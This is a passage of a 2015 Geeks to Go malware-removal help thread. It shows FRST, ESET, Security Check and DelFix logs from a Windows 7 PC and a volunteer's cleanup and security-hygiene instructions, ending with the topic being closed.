MotoHelper 2.0.24 Driver 4.7.1 (HKLM-x32\...\MotoHelper) (Version: 2.0.24 - Motorola)
MotoHelper MergeModules (x32 Version: 1.0.0 - Motorola) Hidden
Motorola Mobile Drivers Installation 4.7.1 (Version: 4.7.1 - Motorola Inc.) Hidden
Mozilla Firefox 35.0.1 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 35.0.1 (x86 en-US)) (Version: 35.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 30.0 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
NVIDIA Display Control Panel (HKLM\...\NVIDIA Display Control Panel) (Version: 6.14.11.9739 - NVIDIA Corporation)
NVIDIA Drivers (HKLM\...\NVIDIA Drivers) (Version: 1.10.58.36 - NVIDIA Corporation)
Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.0.3101 - CyberLink Corp.)
Power2Go (x32 Version: 6.0.3101 - CyberLink Corp.) Hidden
PowerDirector (HKLM-x32\...\InstallShield_{CB099890-1D5F-11D5-9EA9-0050BAE317E1}) (Version: 7.0.3101 - CyberLink Corp.)
PowerDirector (x32 Version: 7.0.3101 - CyberLink Corp.) Hidden
PowerRecover (x32 Version: 5.5.1923 - CyberLink Corp.) Hidden
PVSonyDll (Version: 1.00.0001 - NVIDIA Corporation) Hidden
QuickBooks Pro 2007 (HKLM-x32\...\{7E545666-F422-45FD-B3DF-C0B99A1A579F}) (Version:  - )
QuickBooks Product Listing Service (HKLM-x32\...\{91208A47-5D08-4C79-986F-1931940F51BB}) (Version: 2.0.148 - Intuit)
QuickTime (HKLM-x32\...\{B67BAFBA-4C9F-48FA-9496-933E3B255044}) (Version: 7.74.80.86 - Apple Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6196 - Realtek Semiconductor Corp.)
Remote Control USB Driver (HKLM-x32\...\{8471021C-F529-43DE-84DF-3612E10F58C4}) (Version: 2.3.2.317 - )
SupportSoft Assisted Service (HKLM-x32\...\{5A3F6A80-7913-475E-8B96-477A952CFA43}) (Version: 15 - SupportSoft)
System Mechanic 11 Professional (x32 Version: 14.0.1 - ) Hidden
TaxACT 2002 (HKLM-x32\...\TaxACT 2002) (Version:  - 2nd Story Software, Inc.)
Unity Web Player (HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\...\UnityWebPlayer) (Version:  - Unity Technologies ApS)
WOT for Internet Explorer (HKLM-x32\...\{1D10C273-3F95-42A2-8371-AB6B1F59821B}) (Version: 10.12.20.0 - WOT Services Oy)
WOT for Internet Explorer (HKLM-x32\...\{DCAEC601-735C-41AE-B84F-D792F09FB7D1}) (Version: 12.8.2.0 - WOT Services Oy)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)


==================== Restore Points  =========================

11-02-2015 00:00:06 Scheduled Checkpoint
11-02-2015 23:30:37 Restore Point Created by FRST
12-02-2015 03:02:21 Windows Update

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 20:34 - 2009-06-10 15:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {19861785-BDD8-42B4-B3F3-CDEC9645B61E} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2013-11-04] (Hewlett-Packard Company)
Task: {33C935F7-DEC4-4B25-B766-F94EB2B1B983} - System32\Tasks\SidebarExecute => C:\Program Files (x86)\Windows Sidebar\sidebar.exe [2010-11-20] (Microsoft Corporation)
Task: {3C6FDAA5-1542-460E-BE03-ACA2716CB245} - System32\Tasks\iolo Process Governor => C:\Program Files (x86)\iolo\System Mechanic Professional\iologovernor64.exe [2014-08-13] (iolo technologies, LLC)
Task: {49EF4FC3-AB93-46D1-9C54-25FC137C205B} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Opt-in For HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF_Utils.exe [2013-11-04] (Hewlett-Packard Company)
Task: {4C583E9A-8E4A-490F-9EA8-A5D7EE9F59BB} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2014-05-12] (Hewlett-Packard Company)
Task: {55156DFC-1E3F-4928-A7BB-BA9B4DAD1B68} - System32\Tasks\MotoHelper MUM => C:\Program Files (x86)\Motorola\MotoHelper\MotoHelperUpdate.exe [2010-09-07] ()
Task: {6649D7FA-1AC5-4AEF-9FF7-4FA75A8F2DD9} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-02-10] (Adobe Systems Incorporated)
Task: {74609C4E-09FA-4988-BB96-7D5B449F8002} - System32\Tasks\DVDAgent => c:\Program Files (x86)\Hewlett-Packard\Media\DVD\DVDAgent.exe [2009-07-23] (CyberLink Corp.)
Task: {80187BC4-308F-46A2-B8E1-04E888D8E830} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {92540DDD-8770-4013-8908-1A2C0A0AC1CD} - System32\Tasks\MotoHelper Update => C:\Program Files (x86)\Motorola\MotoHelper\MotoHelperUpdate.exe [2010-09-07] ()
Task: {95A62856-7F89-4E97-A887-F0148640F012} - System32\Tasks\Microsoft_Hardware_Launch_IPoint_exe => c:\Program Files\Microsoft IntelliPoint\IPoint.exe [2011-08-01] (Microsoft Corporation)
Task: {CBEDB8AB-6140-4083-BC35-B36CAA7B546E} - System32\Tasks\HPCeeScheduleForBecky's => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2011-07-15] (Hewlett-Packard)
Task: {CF678EB2-51CA-4090-B4FB-914C8FBED892} - System32\Tasks\MotoHelper Routing => C:\Program Files (x86)\Motorola\MotoHelper\MotoHelperUpdate.exe [2010-09-07] ()
Task: {D7537E41-D01A-4847-91C5-7FB95114D265} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2013-11-04] (Hewlett-Packard Company)
Task: {E339F3FA-AAA2-4BAC-8B27-7A58FFAA9812} - System32\Tasks\CLMLSvc => c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMLSvc.exe [2009-08-05] (CyberLink)
Task: {FAEFB722-03EA-4983-B3F2-59EB9D03E483} - System32\Tasks\RecoveryCDWin7 => C:\Program Files (x86)\Hewlett-Packard\HP TCS\RemEngine.exe [2009-07-08] ()
Task: {FF53208F-0D62-4B0F-A0A2-6B2C63436788} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2015-01-21] (Hewlett-Packard)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\HPCeeScheduleForBecky's.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe

==================== Loaded Modules (whitelisted) ==============

2010-10-09 17:43 - 2009-12-02 14:30 - 00160256 _____ () C:\Windows\system32\iavlsp64.dll
2009-07-08 15:35 - 2009-07-08 15:35 - 00610360 _____ () C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe
2013-10-05 14:42 - 2013-10-05 14:42 - 03379200 _____ () c:\windows\assembly\nativeimages1_v1.1.4322\mscorlib\1.0.5000.0__b77a5c561934e089_a8a3b71c\mscorlib.dll
2013-10-05 14:41 - 2013-10-05 14:41 - 01953792 _____ () c:\windows\assembly\nativeimages1_v1.1.4322\system\1.0.5000.0__b77a5c561934e089_82589bb0\system.dll
2009-08-05 14:45 - 2009-08-05 14:45 - 00931112 ____N () c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMediaLibrary.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)


==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AMP => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AMPSE => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BITS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\EventSystem => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ioloSystemService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vseamps => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vsedsps => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vseqrts => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AMP => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AMPSE => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\BITS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\EventSystem => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ioloSystemService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vseamps => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vsedsps => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vseqrts => ""="Service"

==================== EXE Association (whitelisted) ===============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Becky's\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 208.67.222.222 - 208.67.220.220

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)


==================== Accounts: =============================

Administrator (S-1-5-21-2807770644-2077775581-3253585677-500 - Administrator - Disabled)
ASPNET (S-1-5-21-2807770644-2077775581-3253585677-1007 - Limited - Enabled)
Becky's (S-1-5-21-2807770644-2077775581-3253585677-1000 - Administrator - Enabled) => C:\Users\Becky's
Everyone else (S-1-5-21-2807770644-2077775581-3253585677-1005 - Limited - Enabled) => C:\Users\Everyone else
Guest (S-1-5-21-2807770644-2077775581-3253585677-501 - Limited - Enabled)
HomeGroupUser$ (S-1-5-21-2807770644-2077775581-3253585677-1004 - Limited - Enabled)

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (02/11/2015 11:30:36 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.  hr = 0x80070005, Access is denied.
.
This is often caused by incorrect security settings in either the writer or requestor process.


Operation:
   Gathering Writer Data

Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {7d8ab321-67e9-4e97-9009-d0955f28f4a1}


System errors:
=============
Error: (02/12/2015 08:39:07 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
FileDisk

Error: (02/12/2015 08:38:55 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The iolo FileInfoList Service service failed to start due to the following error:
%%1083

Error: (02/12/2015 08:38:03 AM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \SystemRoot\SysWow64\Drivers\FileDisk.SYS has been blocked from loading due to incompatibility with this system. Please contact your software vendor for a compatible version of the driver.

Error: (02/12/2015 04:13:42 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Windows Defender service hung on starting.

Error: (02/12/2015 04:07:01 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
FileDisk

Error: (02/12/2015 04:06:38 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The iolo FileInfoList Service service failed to start due to the following error:
%%1083

Error: (02/12/2015 04:04:12 AM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \SystemRoot\SysWow64\Drivers\FileDisk.SYS has been blocked from loading due to incompatibility with this system. Please contact your software vendor for a compatible version of the driver.

Error: (02/12/2015 03:57:50 AM) (Source: Service Control Manager) (EventID: 7043) (User: )
Description: The Windows Modules Installer service did not shut down properly after receiving a preshutdown control.

Error: (02/12/2015 02:05:15 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {752073A1-23F2-4396-85F0-8FDB879ED0ED}

Error: (02/11/2015 11:51:50 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Windows Defender service hung on starting.


Microsoft Office Sessions:
=========================
Error: (02/11/2015 11:30:36 PM) (Source: VSS) (EventID: 8194) (User: )
Description: 0x80070005, Access is denied.


Operation:
   Gathering Writer Data

Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {7d8ab321-67e9-4e97-9009-d0955f28f4a1}


==================== Memory info ===========================

Processor: AMD Sempron™ Processor LE-1200
Percentage of memory in use: 68%
Total physical RAM: 894.49 MB
Available physical RAM: 282.5 MB
Total Pagefile: 2317.49 MB
Available Pagefile: 978.15 MB
Total Virtual: 8192 MB
Available Virtual: 8191.86 MB

==================== Drives ================================

Drive c: (HP) (Fixed) (Total:286.05 GB) (Free:215.86 GB) NTFS
Drive d: (FACTORY_IMAGE) (Fixed) (Total:11.94 GB) (Free:2.23 GB) NTFS ==>[System with boot components (obtained from reading drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 298.1 GB) (Disk ID: 1549F232)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=286.1 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=11.9 GB) - (Type=07 NTFS)

==================== End Of Log ============================


  • 0

#7
BrianDrab
Posted 12 February 2015 - 12:25 PM

BrianDrab

    Trusted Helper

  • Malware Removal
  • 3,591 posts

Things are looking much better. How's your machine doing? We need to check for remnants.

 

Step#1 Questions

1. Did you decide to keep Sidebar enabled? It's your choice, I just need to know so it's not removed by a fix if you are still using it.

 

Step#2 - Disable Windows Defender
We need to disable Windows Defender to avoid conflicts with your AV. Having both enabled at the same time can cause undesirable effects. Please do the following to disable.
 
1. Open Windows Defender by clicking the Start button. In the search box, type Defender, and then, in the list of results, click Windows Defender.
2.Click Tools, and then click Options.
3.Click Administrator, clear the Use this program check box, and then click Save. If you're prompted for an administrator password or confirmation, type the password or provide confirmation.

 

Step#3 - ESET Online Scanner and Post Results
Before running this scan, please temporarily disable your antivirus software to avoid conflicts. You can re-enable once it's done. Instructions for doing this on many AVs are here.

 

  • Please go here and click on 1.JPG
  • Note: This site is optimized for Internet Explorer. Please use it for this scan. If you wish to use Firefox or Chrome you will be asked to download the ESET Smart Installer first (esetsmartinstaller_enu.exe). Go ahead and download and run this file.
  • Please accept the ESET Online Scanner EULA and click Start.
  • If prompted, allow the Add-On/Active X to install. If you have problems with this step please see this link.
  • Make sure Enable detection of potentially unwanted applications is selected.
  • Click the Advanced Settings link.
  • Make sure Remove found threats is NOT checked.
  • Make sure Scan archives IS checked.
  • Make sure Scan for potentially unsafe applications IS checked.
  • Make sure Enable Anti-Stealth technology IS checked
  • 2.JPG
     
  • Click on Start
  • The virus signature database will begin to download. Be patient this make take some time depending on the speed of your Internet Connection.
  • When completed the Online Scan will begin automatically.
  • Do not touch either the Mouse or keyboard during the scan otherwise it may stall.
  • When completed, if anything was detected please click the List of found threats link.
  • ThreatsFound.JPG
     
  • Then click the Copy to Clipboard link and paste this information into your next reply.
  • CopyToClipboard.JPG

     

     

  • Then you may click the Back button.
  • Check Uninstall Application on Close before clicking finish.

 

 

Step#4 - Security Check
1. Download Security Check from here or here or here.
2. Save it to your Desktop.
3. Right-click SecurityCheck.exe and select Run as administrator. Follow the onscreen instructions inside of the black box.
4. A Notepad document should open automatically called checkup.txt; please post the contents of that document.
Note: Don't be alarmed if the process runs for 10 to 15 minutes before completing. If it runs for over 30 minutes, just close the program and try running it again.

NOTE: If SecurityCheck aborts and you get the following message: UNSUPPORTED OPERATING SYSTEM! ABORTED! try rebooting the system and then run SecurityCheck again.

 
Items for your next post

1. Answer to question
2. Contents of the ESET log file

3. Security Check log

4. How's your machine doing?

 

 


  • 0

#8
DrkMachine
Posted 12 February 2015 - 10:36 PM

DrkMachine

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 126 posts

Honestely I forgot about the sidebar, It has since been disabled.

 

ESET

 

C:\AdwCleaner\Quarantine\C\Program Files (x86)\ddeaulapeakk\o7J66nrLXWYaYv.exe.vir    a variant of Win32/AdWare.MultiPlug.BN application
C:\AdwCleaner\Quarantine\C\Program Files (x86)\Deealpeak\oSmNSQ24IsmnPx.dll.vir    a variant of Win32/Adware.MultiPlug.EG application
C:\AdwCleaner\Quarantine\C\Program Files (x86)\Deealpeak\oSmNSQ24IsmnPx.exe.vir    a variant of Win32/AdWare.MultiPlug.BN application
C:\AdwCleaner\Quarantine\C\Program Files (x86)\Deealpeak\oSmNSQ24IsmnPx.x64.dll.vir    a variant of Win64/Adware.MultiPlug.F application
C:\AdwCleaner\Quarantine\C\Users\Becky's\AppData\Local\Google\Chrome\User Data\Default\Extensions\eokkoajdojoligedidinemfgbcmmhlfj\4.87\NRMqCuWq6.js.vir    JS/Kryptik.ATB trojan
C:\AdwCleaner\Quarantine\C\Users\Becky's\AppData\Roaming\OpenCandy\0E57CEE5DA9C4638875FF228BCA79C1E\dm.exe.vir    a variant of Win32/OpenCandy.A potentially unsafe application
C:\AdwCleaner\Quarantine\C\Users\Becky's\AppData\Roaming\OpenCandy\F52F6496C1F74805870A9C85EA00F79E\dm.exe.vir    a variant of Win32/OpenCandy.A potentially unsafe application
C:\AdwCleaner\Quarantine\C\Users\Becky's\AppData\Roaming\OpenCandy\F52F6496C1F74805870A9C85EA00F79E\OptimizerPro.exe.vir    a variant of Win32/AdWare.SpeedingUpMyPC.N application
C:\AdwCleaner\Quarantine\C\Users\Everyone else\AppData\Roaming\Mozilla\Firefox\Profiles\i71iguyh.default\Extensions\[email protected]\content\bg.js.vir    JS/Kryptik.ATL trojan
C:\FRST\Quarantine\C\Users\Becky's\AppData\Local\Google\Chrome\User Data\Default\Extensions\ldnhgfghebflgcndlbppfanbchpgmkna\249\TCbUsa.js    JS/Kryptik.ATB trojan
C:\MGtools\Process.exe    Win32/PrcView potentially unsafe application
C:\Windows\assembly\GAC_MSIL\Interop.SHDocVw\1.1.0.0__84542ff99aed6a4d\Interop.SHDocVw.dll    a variant of Win32/Toolbar.Linkury.G potentially unwanted application
 

Security Check

 

 Results of screen317's Security Check version 0.99.96  
 Windows 7 Service Pack 1 x64 (UAC is enabled)  
 Internet Explorer 11  
``````````````Antivirus/Firewall Check:``````````````
 Windows Firewall Enabled!  
System Shield   
 Antivirus up to date!   
`````````Anti-malware/Other Utilities Check:`````````
  Java 64-bit 8 Update 31  
 Adobe Flash Player 16.0.0.305  
 Adobe Reader XI  
 Mozilla Firefox (35.0.1)
````````Process Check: objlist.exe by Laurent````````  
 Common Files Commtouch AntiVirus5 vsedsps.exe
 Common Files Commtouch AntiVirus5 vseamps.exe
 ESET ESET Online Scanner OnlineCmdLineScanner.exe  
 iolo Common Lib ioloServiceManager.exe
 iolo System Mechanic Professional System Shield ioloSSTray.exe
 iolo System Mechanic Professional LiveBoost.exe  
 iolo System Mechanic Professional iologovernor64.exe  
`````````````````System Health check`````````````````
 Total Fragmentation on Drive C: 0%
````````````````````End of Log``````````````````````
 

a bit better. I will have to add more ram. It originally had 2gb of ram, but it looks like a 1gb stick grew legs. Will remedy that shortly.


  • 0

#9
BrianDrab
Posted 12 February 2015 - 10:51 PM

BrianDrab

    Trusted Helper

  • Malware Removal
  • 3,591 posts

OK! Well done, your computer is clean again! :thumbsup: Part of our jobs here at G2G is to help you clean your computer. But beyond that and just as important is to provide you with some information to keep you safe and secure on the net as well as to share knowledge. Following is that information.
 
1. Clean Up!
We need to remove all the tools that we used so that should you ever be re-infected, you will download updated versions which may have updated detection logic.
1. Download Delfix from here.
2. Ensure everything is checked.
3. Click Run.
Note: The program will run for a few moments and then notepad will open with a log. Please paste the log in your next reply.
Note: Delete any  other .bat, .log, .reg, .txt,  and any other files created during this process, and left on the desktop and empty the Recycle Bin.
 
2. Windows Updates
Another essential task is to keep your computer updated with the latest operating system patches and security fixes. Windows Updates are constantly being revised to combat the newest hacks and threats. Microsoft releases security updates that help your computer from becoming vulnerable. It is best if you have these set to download automatically. Follow the instructions below to ensure your settings are optimal.
1. Click the Start Orb in the lower left corner of the screen.
2. Type Windows Update in the search box that appears
3. Click on the Windows Update program that appears in the search results.
Windows%20Update.JPG
4. Click on Change Settings.
CheckForUpdates.JPG
5. Select "Install updates automatically (recommended)" from the Important updates drop-down.
WUChangeSettings.JPG
6. Choose a day and a time when you know the computer will be on and connected to the internet. The default is 3:00AM every day.
7. Ensure that all of the other check boxes are checked.
8. Click OK.
 
3. Keeping Programs Updated
You need to ensure that any programs installed on your machine are kept current. The bad guys exploit vulnerabilities that are found in older versions of software. A very good piece of software that keeps your programs up-to-date is Secunia Personal Software Inspector (PSI). You can download and install it from here. You can read more information about this free software as well as a video walkthrough from here.
 
 
4. Keep Adobe Reader Updated
Check to see what the latest major version of Adobe Reader is here. The full version is something like 11.0.06 for example but the major version is just the first number before the period so 11 in this case or XI.
Verify what version you have by doing the following.
1. Open Adobe Reader
2. Click Help on the menu at the top
3. Select About Adobe Reader
If your major version matches the major version from Adobe then perform the following steps.
1. Open Adobe Reader
2. Click Help on the menu at the top
3. Click Check for Updates
4. Allow any Updates to be downloaded and installed
5. If asked to reboot, please do.
6. Repeat these steps until you are told that no updates are available.
If your major version is lower than the major version from Adobe then perform the following steps.
1. Uninstall Adobe Reader. Click here for instructions on how to uninstall a program.
2. Install the newest version from this website.
Note: Make sure to uncheck the Optional Offer (i.e. Google Chrome, Google Toolbar) unless you really want it.
NOTE: You should disable JavaScript in the program as this is a highly exploitable method for the bad guys to get in your machine. Follow these instructions to disable it in Adobe Reader.
1. Open Adobe Reader
2. Select Edit from the menu and select Preferences
3. Click on JavaScript in the left column and uncheck Enable Acrobat JavaScript.
4. Click OK and close the program.
NOTE: Many installers, including Adobe Reader, offer third-party downloads that are installed automatically when you do not uncheck certain checkboxes. While most of the time not being malicious you usually do not want these on your computer. Be careful during the installation process and you will avoid seeing tons of new unwanted toolbars in your favorite web browser.
 
5. Antimalware- Preventative

Note: Let's keep Malwarebytes installed as it's a fantastic piece of software. Malwarebytes is an anti-malware software and not an antivirus software so it won't conflict with the Antivirus that you are running. I would recommend that you open up this program, allow it to update and scan your machine at least quarterly...monthly if you can.
 
6. Crypto Warning!!!! - Complete Data Loss can occur!
There are particularly nasty infections out there at the moment that encrypt your data and hold it for ransom. You may read more about this here.
New strains of this are coming out all the time. In fact a very new strain called VirRansom (which is a hybrid of CrytoLocker and CryptoWall) has recently been identified and it's a true self-replicating parasitic virus.

 

  • Download CryptoPrevent free for home use here following the instructions below.
  • Save the file to your desktop from the link above and then open the program by clicking Run when prompted from your browser or by going to the desktop where the file was saved and double-clicking.
  • Accept all the defaults during the install. The last screen of the install has a checkmark in "Launch CryptoPrevent". This is good and will launch the program once you click Finish.
  • You will get a prompt asking if you purchased a Product Key for Automatic Updates. You can answer No.
  • You will then be prompted to learn more about automatic updates or if you want to purchase a key. This is up to you but you don't have to.
  • You will then be prompted to apply all default protections. Answer Yes.
  • You may get a message stating that Windows Sidebar and Desktop Gadgets are a major security vulnerability and asking you if you want to disable them. If you don't use these features, answer Yes.
  • That's it. The protection is in place.

Note: The free version doesn't provide automatic updates. Periodically, you should open up the program (there is a shortcut on your desktop now) and select the Updates! menu....and select Check for Updates to see if there are any as this infection has serious consequences.
 
UpdatesV7.4.11.JPG
 
 
7. Adobe Flash Player
There's a very nasty piece of malware going around right now called Cryptowall. It's very destructive and most recently the newest variant is exploiting unpatched versions of Adobe Flash. Let's make sure you get current.

 

1. Determine if you have the most current version by going to this website. If your version represented by the top box matches the version in the bottom box you are current.
VerifyVersion.JPG
 
2. If your version is older than the current then click on the Player Download Center link (shown in the screen shot above).
3. You will be brought to the install/update page. Ensure you uncheck any optional offers (unless you want them of course) and then click on Install Now.
Install.JPG
 
4. You may be prompted to run the installer. Go ahead and do this.
5. When it's complete, click Finish. You now have the latest version. You can verify by going back to this website if you feel the need.
 
 
For more information about computer security and how to protect yourself when on the internet, please read this guide Best Practices for Safe Computing
 
OK, all the best, and stay safe!
 
Items for your next post
1. Contents of the delfix log


  • 0

#10
DrkMachine
Posted 13 February 2015 - 12:35 PM

DrkMachine

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 126 posts

wonderfull, thank you very much for the assistance.

 

# DelFix v10.8 - Logfile created 13/02/2015 at 08:00:34
# Updated 29/07/2014 by Xplode
# Username : Becky's - BETTYSDESKTOP-P
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)

~ Activating UAC ... OK

~ Removing disinfection tools ...

Deleted : C:\FRST
Deleted : C:\AdwCleaner
Deleted : C:\Users\Becky's\Desktop\Addition.txt
Deleted : C:\Users\Becky's\Desktop\AdwCleaner.exe
Deleted : C:\Users\Becky's\Desktop\AdwCleaner[S0].txt
Deleted : C:\Users\Becky's\Desktop\aswMBR.exe
Deleted : C:\Users\Becky's\Desktop\aswMBR.txt
Deleted : C:\Users\Becky's\Desktop\Extras.Txt
Deleted : C:\Users\Becky's\Desktop\Fixlog.txt
Deleted : C:\Users\Becky's\Desktop\FRST.txt
Deleted : C:\Users\Becky's\Desktop\FRST64.exe
Deleted : C:\Users\Becky's\Desktop\JRT.exe
Deleted : C:\Users\Becky's\Desktop\JRT.txt
Deleted : C:\Users\Becky's\Desktop\MBR.dat
Deleted : C:\Users\Becky's\Desktop\OTL.Txt
Deleted : C:\Users\Becky's\Desktop\OTL.exe
Deleted : C:\Users\Becky's\Desktop\SecurityCheck.exe
Deleted : HKLM\SOFTWARE\OldTimer Tools
Deleted : HKLM\SOFTWARE\AdwCleaner
Deleted : HKLM\SOFTWARE\TrendMicro\Hijackthis
Deleted : HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_ASWMBR

~ Creating registry backup ... OK

~ Cleaning system restore ...


New restore point created !

~ Resetting system settings ... OK

########## - EOF - ##########
 


  • 0

#11
BrianDrab
Posted 13 February 2015 - 12:36 PM

BrianDrab

    Trusted Helper

  • Malware Removal
  • 3,591 posts
Since this issue appears to be resolved ... this Topic has been closed. Glad we could help. :)

If you're the topic starter, and need this topic reopened, please contact a staff member with the address of the thread.

Everyone else please begin a New Topic.
  • 0
Back to Virus, Spyware, Malware Removal · Next Unread Topic →




Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

  1. Geeks to Go Community
  2. Security
  3. Virus, Spyware, Malware Removal

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP